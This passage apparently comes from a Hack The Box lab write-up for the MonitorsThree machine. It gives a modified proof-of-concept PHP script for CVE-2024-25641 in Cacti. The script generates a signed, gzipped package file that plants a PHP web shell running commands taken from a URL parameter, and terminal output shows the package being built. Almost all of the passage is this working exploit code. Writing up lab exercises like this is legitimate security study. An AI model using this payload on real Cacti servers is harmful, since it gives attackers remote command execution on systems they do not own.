Malicious Package


Following the same structure of the [[MonitorsThree_CVE-2024-25641#Exploit ([PoC](https //github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88))|original PoC]]

<?php
 
$xmldata = "<xml>
   <files>
       <file>
           <name>resource/CVE-2024-25641.php</name>
           <data>%s</data>
           <filesignature>%s</filesignature>
       </file>
   </files>
   <publickey>%s</publickey>
   <signature></signature>
</xml>";
$filedata = '<?php system($_GET["cmd"]); ?>';
 
$keypair = openssl_pkey_new(); 
$public_key = openssl_pkey_get_details($keypair)["key"]; 
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
 
file_put_contents("CVE-2024-25641.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
 
system("cat CVE-2024-25641.xml | gzip -9 > CVE-2024-25641.xml.gz; rm CVE-2024-25641.xml");
 
?>

The [[MonitorsThree_CVE-2024-25641#Exploit ([PoC](https //github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88))|original PoC]] has been modified to include a web shell

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ php CVE-2024-25641.php 
 
┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ ll CVE-2024-25641.xml.gz 
4.0K -rw-rw-r-- 1 kali kali 1.2K Aug 25 19:02 CVE-2024-25641.xml.gz

Malicious package has been successfully generated